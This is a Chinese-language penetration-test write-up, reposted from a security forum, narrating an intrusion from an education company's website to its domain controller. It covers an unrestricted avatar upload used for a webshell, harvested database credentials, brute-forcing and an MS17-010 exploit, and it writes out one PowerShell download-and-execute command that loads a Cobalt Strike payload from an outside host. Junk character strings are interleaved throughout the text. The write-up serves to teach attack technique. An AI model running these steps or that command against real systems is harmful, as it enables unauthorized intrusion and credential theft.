|
! G+ M! }2 N4 A+ J: v8 X- [, x5 \ 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路4 l7 \) L$ N& }8 i' o9 A. [* d7 m+ G
, O" @- x3 I3 U: M5 k, K* p9 x" f" F9 W, T
0 f* [0 C. O& A4 I! }
$ k0 T/ H6 z, @0 V. r
3 a4 L' G8 R, e. }* C8 H 正文
* |" V8 X' v+ k O
- m9 j; b8 I1 U
! H) a# R" o- @3 i' j4 q ! F# a5 O% Y- m0 i: i: g; E
, S5 i5 x B. L+ l3 U4 [, g, \2 y
目标:www.xxxx.com(一家教育机构) 5 N: w8 Q7 l3 k; a% e
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
- M4 q. M! \) U; w" C" C
* k( d4 D C/ m! s F# {; F* N
, r* b3 y8 B5 f. W8 g! h $ X& n: h( q. b$ {3 A' w8 Y
' t) M( U5 D; R/ U# O) [; P& Z* j! e; r! d b* x) x# Q% _
进行了简单的信息搜集 , l% a$ v5 q; j* Y) x( `
- b1 q3 I' P; U H) E6 I$ G0 V! N, N) Q6 C, M4 P6 h( p
/ h# ~3 Z1 Z7 }& X: L
$ n& e1 t1 b* n 子域名搜集/ \1 n X7 G' c8 j* [% g
# @9 s: S2 V' y. I+ c$ ?
( x9 p' d. X6 X" ^+ N% r
+ W% k+ M$ t0 u$ U8 w, g - W. O$ |. y* I! |& C
& H# S3 l4 _' N' w9 v0 N
fofa找资产
: b# R3 E4 L( P6 ^& o# R6 L# V & K/ `9 n% Q9 U) T1 `; c) T9 I2 v
7 K9 I# v* V3 T3 ~# i
; R$ T( ?& j$ f6 N ]5 M. Z( P/ Q' w
9 ~0 h* \9 \& S3 X; C* y) l9 [
2 t# L! X4 c+ }. u, C3 t% {2 b1 S/ e8 h! R# l# J4 b/ ~0 l a+ j
一共七个资产。去重之后只有两个。
1 E \2 j2 e% {. q; Y. f! G
; c, K1 ]) L! a
, n4 ]" D F3 n8 s7 n3 _ K( d
/ T3 N- [9 G& R: w0 O
! r: @4 r0 E) \4 } 目录探测
$ y1 T+ P0 q- r0 `/ Y : ]6 x6 M! T- \4 m6 w3 s0 o2 h
+ Y& Q( N6 S7 _, [6 f5 L . r n- h0 _' Z! C" V- M7 b1 U9 k
+ X& [$ m# u( }9 g3 F3 w6 T/ `3 ]; | `& O2 }
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
+ _( [% L9 R5 j5 g" N! H0 n3 e$ U( _
H& a2 G0 W3 y7 T ^8 ~. J7 R |; O# V5 f$ t
' e: k9 z" D; I- [ T
7 b- j+ x! O6 C% n- L 我又尝试了通过修改返回包来绕过登录界面
, g Q( L, x. D% o
6 T3 U3 G2 y1 |. ` _ B6 T1 T1 G8 r s; ]( Z0 ]! U8 S. _
4 L- f, }( r: R" Y9 c; @0 M
/ T0 l1 h! R# I- W q6 ^) g% J6 S J# n5 a( ]
还是不行,尝试注入无果$ }( S) y! ` h0 E, [# Y0 N. p! \
; Z/ G& z6 z# C+ R D
7 e; i$ L6 g& q% d# B0 V7 \/ j $ {8 b$ p, Q6 g( i3 R% s2 x
' v4 D: d) ~5 e. q
[2 J+ _4 I, `+ w 不过我目录探测出了一处Spring信息泄露
w" K- ^ D. _: p7 `
+ w; {7 `% Z9 B$ X$ M
! R2 D! ^* @: D5 `4 F4 [8 c7 Z* a/ i ( z! D( {( n: f7 r
7 H3 u, J% K# W* d& @
. E3 K- Q( d2 T# g! E2 i 5 L: o* e- Y8 D. i9 C! z
7 p$ ?" `; y+ i4 P. |
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
3 V0 ?; P0 u! G" X! M8 k - T/ z( H4 r! C+ [$ R
6 \" D- n9 s- L. m
; c. t$ y: x/ s" R; z G; t4 A& d! X
) n/ u, n1 y( p3 W$ g# C
9 ~0 y' ~' I/ [+ ^0 \ 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。; @+ }, O4 }9 A- _* U- S! W
1 o, l8 h; I3 ]' Q/ z Y* u6 r
8 S U/ a9 U& q& }5 G( L) j
1 i0 U/ T" t/ g4 \) Q3 U) @& A
{6 F1 `' R8 t! c) {9 t6 f
( {2 a) m8 Z9 w- ? 获取有些师傅到这一步就手机抓包电脑测了。
! W3 o) [* L4 D2 r
. @2 ?0 `' X3 c+ |! x: m% C; m* _' N; ^5 W
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 y0 W5 i% d0 M) D4 V4 L
7 W/ a+ a# n! R' ?' K+ ^
9 Q0 j$ }! R2 p* R/ p+ I, O$ F 其中在一个公众号发现了小程序,可以进行注册。
& @6 {7 M; M* i1 ^ , q+ l! ~! [% H& l# n! b
1 }7 G6 v5 L X* _/ h5 [ 看到了头像上传,尝试上传获取WebShell7 g1 J* g7 o! I: W
1 P! {& `5 F/ ?1 P/ Z- C. C
+ Z- ]6 Q$ G% {% N
9 l( O& X, C9 a+ l; m! `
) y* A9 p; _: p' p1 w6 j; P. D2 ^! T0 E
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问& r' x( U5 i8 ^& |+ d
( r4 w( o' S1 t5 M3 q
# X: \1 q! T4 i' p7 \, m! P ( I. _! ~% _! o
1 {0 u! J" X; ]# N) m/ u' f
8 A, X- ]% B8 u' e# ]" [. p7 x 然后上了大马, b6 n) ^( K/ F9 B, ~2 Y
& `) @9 ?& {8 c* z T1 @
5 |; _; d9 X' [/ U; p& S9 h$ P 2 w) S: J8 b' G% t2 y2 Q
: t% `* x9 Q2 o: a$ i) a
$ P$ O1 o* K; M# r5 T' H \
2 Q; Y8 S3 m. t( q( X
- z& G: Y% P' _. p; t. z
) e/ L1 O8 [; F& A1 U 通过翻找文件发现数据库账号密码
0 W4 u, u( d7 k: {: C$ b 7 e* v1 m* q+ A
2 K. b+ O) ]2 E& D7 F7 \ 5 U J0 s3 `" ^) K, O
- U$ K9 \0 B% w5 p& [1 X$ u g3 Z4 G5 }4 M" C
--内网渗透
2 k4 q; a; G E- i' S! V
. W& m( n/ X( D; t! v+ }/ @1 h* H- p9 x8 d% h
直接通过powershell执行 cs上线
6 |( h8 N I* o7 y; J : p6 W2 A. G: \) ~
! ?0 b5 i+ h5 R3 F$ F4 X2 N& `+ `5 N
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
+ m1 f- b# v" V" m% b( C
7 L9 t$ h+ c" @; g; k( _& ?/ b
; L% b9 k0 B8 N. f' C' a, W& J8 ~( _8 w
5 b" g- k! }: N- E# k. { . F5 u2 S- c! z; P' _4 y
: T/ `& F* J& w. r3 }/ ?, i" m 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破$ N" Y$ n3 I6 R+ U! s- ~0 p
( d0 p0 ?$ o2 W$ H
6 _8 J! q2 Z% M) |, A
9 K8 i( T- @$ a2 ]
, y/ C5 C5 f- B+ r2 n0 f
5 W3 ]. c$ C; q2 X/ A 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 ! N+ t& A7 i/ {$ C
: ?+ a" Y- ]3 Y5 q
. |' E6 G( Z8 g) x6 ` c% O& T7 i; A* h) o
( R1 b; |- \7 J& X+ V, K! N- f# O0 p# h9 h1 b5 b
: G% S. v, D1 B( r8 C, J0 J/ ~ 8 E1 S0 S, [* c# d
! @, V/ t9 L! n8 A7 j: H 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 7 O* [5 Z/ A4 m: \; J0 @
6 d- Z: m' y7 O8 g7 p
) K& w: T8 q/ x
0 C/ b8 h9 @6 W) y# [; O; p
" [0 s" |8 ?& p
1 P9 {) V* N% y, @5 z$ ? u; U0 n& E1 v; K
7 W) T% S! r4 E3 a' j, L
# f j& f: {$ F
( f' k; C; e. W s2 l- z
) k5 d8 L* O6 K: b! l @
" s4 _9 ^; [" u- y/ k, f3 ?
& [9 Q+ L7 J; M9 B
) U) b1 f" p' ~; C% Y/ e& a
+ D! B2 _+ `* \. y; ?6 R/ U' ~+ U5 G& F! w! U5 r6 c( f* U
小结
: b2 g2 g8 a, F6 o
0 ?5 t3 W. ^1 g5 w+ Z& ^& r) V4 }, C0 k( y! y9 n8 l8 a
3 g! ]: G2 N0 n1 c Z. G$ u # ], ^" V/ @. c2 J$ o
, n, l: T! s7 j' E$ [( r 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!+ N0 [7 u3 n* S! Z
) I9 o* s- f( o, U! }- a$ a* o
) K. o: @6 I9 F1 b) j
5 l, G* t: U* V3 W6 {$ [# B
0 l! |5 Q# n2 B* Z/ n7 `$ x0 F1 y8 ]+ m! p
-
6 m" i X d; ?. f 9 _. a7 M& U" f$ g) B
- L% w8 p, G$ \/ j \ - . ^ y* O6 l( t+ Z% C) l( O2 ^/ |
: ~: M5 e U% {3 J% ]
% `+ B/ p7 R8 R! T+ w( x/ z/ e P 5 ~1 b, Z ?7 f! F3 \! X8 m
* r) O7 f2 n% A8 h% R4 D
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
4 Y" w {! A" H" x) B4 n
6 T/ M, b! s* d5 _6 e: P& ^; g
1 r* b5 u: l2 N a+ ~
; V( ^- M" ]1 G; X |